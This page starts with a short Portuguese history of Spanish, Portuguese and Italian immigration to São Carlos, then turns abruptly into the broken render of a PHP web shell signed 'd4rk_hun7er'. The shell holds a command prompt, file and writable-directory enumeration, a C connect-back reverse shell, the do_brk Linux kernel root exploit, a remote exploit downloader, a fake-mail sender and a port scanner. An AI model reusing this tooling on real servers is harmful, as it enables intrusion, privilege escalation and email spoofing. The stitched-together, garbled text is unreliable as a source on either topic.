Os primeiros imigrantes chegaram a São Carlos em 1876. Em 1886, os imigrantes já eram 1/8 da população, a segunda taxa mais alta de imigrantes no Estado.
Foram três as correntes migratórias: a espanhola, a portuguesa, e a italiana.
A colônia espanhola era muito organizada e com espírito associativo, graças à "Real Sociedad Española Beneficente y Instructiva", fundada em 1896. A sociedade construiu prédio próprio, que ainda existe, sendo doado à Sociedade de São Vicente de Paulo pelos últimos membros da colônia.
Os portugueses sempre foram em maior número em São Carlos, tendo representação consular ou vice-consular até os dias de hoje.
Mas a mais poderosa corrente migratória foi a italiana. Já em 1882 havia uma associação de proteção aos colonos italianos.
Os primeiros imigrantes vieram do sul da Itália, e os primeiros a se unirem em sindicatos. Vieram então os italianos do Norte e Nordeste e fundaram a "Societá Dante Alighieri", construindo prédio próprio (a Casa D"Itália, que seria anos mais tarde o primeiro prédio da Escola de Engenharia), no qual foi mantida uma escola para os filhos dos italianos, alcançando fama e eficiência, desaparecendo somente durante a perseguição aos descendentes italianos devido à Segunda Guerra Mundial.
/
CMD by d4rk_hun7er
/ **
*.: Changing The Rules :.*
*
*
*INFORMAÇÕES DO SISTEMA:
*
:
Script Current User:
PHP Version:
User Info: uid() euid() gid()
Current Path:
Server IP:
Web Server:
*
"; ?> *
*Prompt de Comando*
*&1"); $output = ob_get_contents(); ob_end_clean( ); ?> <?php if
(!empty($output)) echo str_replace(">", ">", str_replace("<", "<",
$output)); ?>
[*] Safemode Mode Run"; ?> *
*Safe Mode Directory Listing*
*"; echo ""; echo ""; echo "*List All Files*
"; while (($file = readdir($dir)) !== false) { if (@is_file($file)) {
$file1 = fileowner($file); $file2 = fileperms($file); echo "$file1 -
$file2 - $file <$SCRIPT_NAME?$QUERY_STRING&see=$file>
"; // echo "$file1 - $file2 - $file
"; flush( ); } } echo ""; echo""; echo "*List Only Folders*
"; if ($dir = @opendir($chdir)) { while (($file = readdir($dir)) !==
false) { if (@is_dir($file)) { $file1 = fileowner($file); $file2 =
fileperms($file); echo "$file1 - $file2 - $file
<$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>
"; // echo "$file1 - $file2 - $file
"; } } } echo ""; echo""; echo "*List Writable Folders*
"; if ($dir = @opendir($chdir)) { while (($file = readdir($dir)) !==
false) { if (@is_writable($file) && @is_dir($file)) { $file1 =
fileowner($file); $file2 = fileperms($file); echo "$file1 - $file2 - $file
"; } } } echo ""; echo ""; echo ""; echo "*List Writable Files*
"; if ($dir = opendir($chdir)) { while (($file = readdir($dir)) !==
false) { if (@is_writable($file) && @is_file($file)) { $file1 =
fileowner($file); $file2 = fileperms($file); echo "$file1 - $file2 - $file
"; } } } echo ""; echo ""; echo ""; } } ?>
" . "#include
" .
"#include
" . "#include
" . "#include
" . "int main(int argc, char
**argv) {
" . " char *host;
" . " int port = 80;
" . " int f;
" . "
int l;
" . " int sock;
" . " struct in_addr ia;
" . " struct
sockaddr_in sin, from;
" . " struct hostent *he;
" . " char msg[ ] =
"Welcome to Data Cha0s Connect Back Shell\n\n"
" . " "Issue
\"export TERM=xterm; exec bash -i\"\n"
" . " "For More Reliable
Shell.\n"
" . " "Issue \"unset HISTFILE; unset
SAVEHIST\"\n"
" . " "For Not Getting Logged.\n(;\n\n";
" . "
printf("Data Cha0s Connect Back Backdoor\n\n");
" . " if (argc < 2
|| argc > 3) {
" . " printf("Usage: %s [Host] \n", argv[0]);
" . "
return 1;
" . " }
" . " printf("[*] Dumping Arguments\n");
" . " l
= strlen(argv[1]);
" . " if (l <= 0) {
" . " printf("[-] Invalid Host
Name\n");
" . " return 1;
" . " }
" . " if (!(host = (char *)
malloc(l))) {
" . " printf("[-] Unable to Allocate Memory\n");
" .
" return 1;
" . " }
" . " strncpy(host, argv[1], l);
" . " if (argc
== 3) {
" . " port = atoi(argv[2]);
" . " if (port <= 0 || port >
65535) {
" . " printf("[-] Invalid Port Number\n");
" . " return
1;
" . " }
" . " }
" . " printf("[*] Resolving Host Name\n");
" .
" he = gethostbyname(host);
" . " if (he) {
" . " memcpy(&ia.s_addr,
he->h_addr, 4);
" . " } else if ((ia.s_addr = inet_addr(host)) ==
INADDR_ANY) {
" . " printf("[-] Unable to Resolve: %s\n", host);
"
. " return 1;
" . " }
" . " sin.sin_family = PF_INET;
" . "
sin.sin_addr.s_addr = ia.s_addr;
" . " sin.sin_port = htons(port);
" .
" printf("[*] Connecting...\n");
" . " if ((sock = socket(AF_INET,
SOCK_STREAM, 0)) == -1) {
" . " printf("[-] Socket Error\n");
" . "
return 1;
" . " }
" . " if (connect(sock, (struct sockaddr *)&sin,
sizeof(sin)) != 0) {
" . " printf("[-] Unable to Connect\n");
" . "
return 1;
" . " }
" . " printf("[*] Spawning Shell\n");
" . " f =
fork( );
" . " if (f < 0) {
" . " printf("[-] Unable to
Fork\n");
" . " return 1;
" . " } else if (!f) {
" . " write(sock,
msg, sizeof(msg));
" . " dup2(sock, 0);
" . " dup2(sock, 1);
" . "
dup2(sock, 2);
" . " execl("/bin/sh", "shell", NULL);
" . "
close(sock);
" . " return 0;
" . " }
" . " printf("[*]
Detached\n\n");
" . " return 0;
" . "}
"; $fp =
fopen("/tmp/dc-connectback.c", "w"); $ok = fwrite($fp, $shell); if
(!empty($ok)) { echo "*
*[*] Connect Back Shell Was Successfuly Copied*
*"; } else { echo "*
*[-] An Error Has Ocurred While Copying Shell*
*"; } } if ($kernel == "write") { $kernel = "/*
" . " *
hatorihanzo.c
" . " * Linux kernel do_brk vma overflow exploit.
" . "
*
" . " * The bug was found by Paul (IhaQueR) Starzetz
" . " *
" . "
* Further research and exploit development by
" . " * Wojciech
Purczynski and Paul Starzetz.
" . " *
" . " * (c) 2003 Copyright by
IhaQueR and cliph. All Rights Reserved.
" . " *
" . " * COPYING,
PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE
" . " *
OF PRESENTED CODE IS STRICTLY PROHIBITED.
" . "*/
" . "#define
_GNU_SOURCE
" . "#include
" . "#include
" . "#include
" .
"#include
" . "#include
" . "#include
" . "#include
" .
"#include
" . "#include
" . "#include
" . "#include
" .
"#include
" . "#include
" . "#include
" . "#include
" .
"#include
" . "#include
" . "#include
" . "#include
" .
"#include
" . "#include
" . "#define kB * 1024
" . "#define MB *
1024 kB
" . "#define GB * 1024 MB
" . "#define MAGIC 0xdefaced /* I
should've patented this number -cliph */
" . "#define ENTRY_MAGIC 0
"
. "#define ENTRY_GATE 2
" . "#define ENTRY_CS 4
" . "#define ENTRY_DS
6
" . "#define CS ((ENTRY_CS << 2) | 4)
" . "#define DS ((ENTRY_DS <<
2) | 4)
" . "#define GATE ((ENTRY_GATE << 2) | 4 | 3)
" . "#define
LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)
" .
"#define TOP_ADDR 0xFFFFE000U
" . "/* configuration */
" . "unsigned
task_size;
" . "unsigned page;
" . "uid_t uid;
" . "unsigned
address;
" . "int dontexit = 0;
" . "void fatal(char * msg)
" . "{
"
. " fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno));
" . " if
(dontexit) {
" . " fprintf(stderr, "[-] Unable to exit, entering
neverending loop.\n");
" . " kill(getpid(), SIGSTOP);
" . " for (;;)
pause();
" . " }
" . " exit(EXIT_FAILURE);
" . "}
" . "void
configure(void)
" . "{
" . " unsigned val;
" . " task_size =
((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
" . " uid = getuid();
" .
"}
" . "void expand(void)
" . "{
" . " unsigned top = (unsigned)
sbrk(0);
" . " unsigned limit = address + PAGE_SIZE;
" . " do {
" . "
if (sbrk(PAGE_SIZE) == NULL)
" . " fatal("Kernel seems not to be
vulnerable");
" . " dontexit = 1;
" . " top += PAGE_SIZE;
" . " }
while (top < limit);
" . "}
" . "jmp_buf jmp;
" . "#define MAP_NOPAGE
1
" . "#define MAP_ISPAGE 2
" . "void sigsegv(int signo, siginfo_t *
si, void * ptr)
" . "{
" . " struct ucontext * uc = (struct ucontext
*) ptr;
" . " int error_code = uc->uc_mcontext.gregs[REG_ERR];
" . "
(void)signo;
" . " (void)si;
" . " error_code = MAP_NOPAGE +
(error_code & 1);
" . " longjmp(jmp, error_code);
" . "}
" . "void
prepare(void)
" . "{
" . " struct sigaction sa;
" . " sa.sa_sigaction
= sigsegv;
" . " sa.sa_flags = SA_SIGINFO | SA_NOMASK;
" . "
sigemptyset(&sa.sa_mask);
" . " sigaction(SIGSEGV, &sa, NULL);
" .
"}
" . "int testaddr(unsigned addr)
" . "{
" . " int val;
" . " val
= setjmp(jmp);
" . " if (val == 0) {
" . " asm ("verr (%%eax)" : :
"a" (addr));
" . " return MAP_ISPAGE;
" . " }
" . " return val;
"
. "}
" . "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) /
PAGE_SIZE)
" . "#define map_size (map_pages + 8*sizeof(unsigned) - 1) /
(8*sizeof(unsigned))
" . "#define next(u, b) do { if ((b = 2*b) == 0) {
b = 1; u++; } } while(0)
" . "void map(unsigned * map)
" . "{
" . "
unsigned addr = task_size;
" . " unsigned bit = 1;
" . " prepare();
"
. " while (addr < TOP_ADDR) {
" . " if (testaddr(addr) ==
MAP_ISPAGE)
" . " *map |= bit;
" . " addr += PAGE_SIZE;
" . "
next(map, bit);
" . " }
" . " signal(SIGSEGV, SIG_DFL);
" . "}
" .
"void find(unsigned * m)
" . "{
" . " unsigned addr = task_size;
" .
" unsigned bit = 1;
" . " unsigned count;
" . " unsigned tmp;
" . "
prepare();
" . " tmp = address = count = 0U;
" . " while (addr <
TOP_ADDR) {
" . " int val = testaddr(addr);
" . " if (val ==
MAP_ISPAGE && (*m & bit) == 0) {
" . " if (!tmp) tmp = addr;
" . "
count++;
" . " } else {
" . " if (tmp && count == LDT_PAGES) {
" . "
errno = EAGAIN;
" . " if (address)
" . " fatal("double
allocation\n");
" . " address = tmp;
" . " }
" . " tmp = count =
0U;
" . " }
" . " addr += PAGE_SIZE;
" . " next(m, bit);
" . " }
"
. " signal(SIGSEGV, SIG_DFL);
" . " if (address)
" . " return;
" . "
errno = ENOTSUP;
" . " fatal("Unable to determine kernel
address");
" . "}
" . "int modify_ldt(int, void *, unsigned);
" .
"void ldt(unsigned * m)
" . "{
" . " struct modify_ldt_ldt_s l;
" . "
map(m);
" . " memset(&l, 0, sizeof(l));
" . " l.entry_number =
LDT_ENTRIES - 1;
" . " l.seg_32bit = 1;
" . " l.base_addr = MAGIC >>
16;
" . " l.limit = MAGIC & 0xffff;
" . " if (modify_ldt(1, &l,
sizeof(l)) == -1)
" . " fatal("Unable to set up LDT");
" . "
l.entry_number = ENTRY_MAGIC / 2;
" . " if (modify_ldt(1, &l,
sizeof(l)) == -1)
" . " fatal("Unable to set up LDT");
" . "
find(m);
" . "}
" . "asmlinkage void kernel(unsigned * task)
" .
"{
" . " unsigned * addr = task;
" . " /* looking for uids */
" . "
while (addr[0] != uid || addr[1] != uid ||
" . " addr[2] != uid ||
addr[3] != uid)
" . " addr++;
" . " addr[0] = addr[1] = addr[2] =
addr[3] = 0; /* uids */
" . " addr[4] = addr[5] = addr[6] = addr[7] =
0; /* uids */
" . " addr[8] = 0;
" . " /* looking for vma */
" . "
for (addr = (unsigned *) task_size; addr; addr++) {
" . " if (addr[0]
>= task_size && addr[1] < task_size &&
" . " addr[2] == address &&
addr[3] >= task_size) {
" . " addr[2] = task_size - PAGE_SIZE;
" . "
addr = (unsigned *) addr[3];
" . " addr[1] = task_size - PAGE_SIZE;
"
. " addr[2] = task_size;
" . " break;
" . " }
" . " }
" . "}
" .
"void kcode(void);
" . "#define __str(s) #s
" . "#define str(s)
__str(s)
" . "void __kcode(void)
" . "{
" . " asm(
" . " "kcode:
\n"
" . " " pusha \n"
" . " " pushl %es \n"
" . " " pushl
%ds \n"
" . " " movl $(" str(DS) ") ,%edx \n"
" . " " movl
%edx,%es \n"
" . " " movl %edx,%ds \n"
" . " " movl
$0xffffe000,%eax \n"
" . " " andl %esp,%eax \n"
" . " " pushl
%eax \n"
" . " " call kernel \n"
" . " " addl $4, %esp \n"
"
. " " popl %ds \n"
" . " " popl %es \n"
" . " " popa \n"
" .
" " lret \n"
" . " );
" . "}
" . "void knockout(void)
" . "{
" .
" unsigned * addr = (unsigned *) address;
" . " if (mprotect(addr,
PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)
" . " fatal("Unable to change
page protection");
" . " errno = ESRCH;
" . " if (addr[ENTRY_MAGIC]
!= MAGIC)
" . " fatal("Invalid LDT entry");
" . " /* setting call
gate and privileged descriptors */
" . " addr[ENTRY_GATE+0] =
((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);
" . "
addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
" . "
addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */
" .
" addr[ENTRY_CS+1] = 0x00cf9a00U;
" . " addr[ENTRY_DS+0] = 0x0000ffffU;
/* user 4GB code at 0x00000000 */
" . " addr[ENTRY_DS+1] =
0x00cf9200U;
" . " prepare();
" . " if (setjmp(jmp) != 0) {
" . "
errno = ENOEXEC;
" . " fatal("Unable to jump to call gate");
" . "
}
" . " asm("lcall $" str(GATE) ",$0x0"); /* this is it */
" .
"}
" . "void shell(void)
" . "{
" . " char * argv[] = { _PATH_BSHELL,
NULL };
" . " execve(_PATH_BSHELL, argv, environ);
" . "
fatal("Unable to spawn shell\n");
" . "}
" . "void remap(void)
" .
"{
" . " static char stack[8 MB]; /* new stack */
" . " static char *
envp[] = { "PATH=" _PATH_STDPATH, NULL };
" . " static unsigned *
m;
" . " static unsigned b;
" . " m = (unsigned *) sbrk(map_size);
"
. " if (!m)
" . " fatal("Unable to allocate memory");
" . " environ
= envp;
" . " asm ("movl %0, %%esp\n" : : "a" (stack +
sizeof(stack)));
" . " b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) &
PAGE_MASK;
" . " if (munmap((void*)b, task_size - b) == -1)
" . "
fatal("Unable to unmap stack");
" . " while (b < task_size) {
" . "
if (sbrk(PAGE_SIZE) == NULL)
" . " fatal("Unable to expand BSS");
"
. " b += PAGE_SIZE;
" . " }
" . " ldt(m);
" . " expand();
" . "
knockout();
" . " shell();
" . "}
" . "int main(void)
" . "{
" . "
configure();
" . " remap();
" . " return EXIT_FAILURE;
" . "}
"; $fp
= fopen("/tmp/xpl_brk.c", "w"); $ok = fwrite($fp, $kernel); if
(!empty($ok)) { echo "*
*[*] Linux Local Kernel Exploit Was Successfuly Copied*
*"; } else { echo "*
*[-] An Error Has Ocurred While Copying Kernel Exploit*
*"; } } ?> *
*
";
echo "";
echo "$read";
Echo "";
}
// Function to Dowload Local Xploite Binary COde or Source Code
if ($dx != "") {
$fp = @fopen("$hostxpl",r);
$fp2 = @fopen("$storage","w");
fwrite($fp2, "");
$fp1 = @fopen("$storage","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "*
*[-] An Error Has Ocurred While Uploading File*
*";
break;
}
}
if (!empty($ok)) {
echo "*
*[*] File Was Successfuly Uploaded*
*";
}
}
flush( );
// Function to visulize Format Color Source Code PHP
if ($sfc != "") {
$showcode = show_source("$sfc");
echo " $showcode ";
}
// Function to Visualize all infomation files
if ($fileinfo != "") {
$infofile = stat("$fileanalize");
while (list($info, $value) = each ($infofile)) {
echo" Info: $info Value: $value
";
}
}
// Function to send fake mail
if ($fake == 1) {
echo "*
*"; echo "Your Fake Mail
"; echo "Your Cavy:
"; echo "Suject:
"; echo "Text:
"; echo "
"; echo ""; echo ""; } if($send == 1) { if (mail($cavy, $subject, $body,
"From: $yourmail
")) { echo "*
*[*] Mail Send Sucessfuly*
*"; } else { echo "*
*[-] An Error Has Ocurred While Sending Mail*
*"; } } if ($portscan != "") { $port = array
("21","22","23","25","110",); $values = count($port); for ($cont=0;
$cont < $values; $cont++) { @$sock[$cont] = Fsockopen($SERVER_NAME,
$port[$cont], $oi, $oi2, 1); $service =
Getservbyport($port[$cont],"tcp"); @$get = fgets($sock[$cont]); echo "
Port: $port[$cont] - Service: $service
"; echo "
Banner: $get
"; flush(); } } ?> *
*
Free Hosting Provided By: HostBigger.com <http://www.hostbigger.com> -
Made Possible By: CWIhosting.com <http://www.cwihosting.com>
Reliable Business Web Hosting and Development Services at CWI Hosting!
<http://www.cwihosting.com> *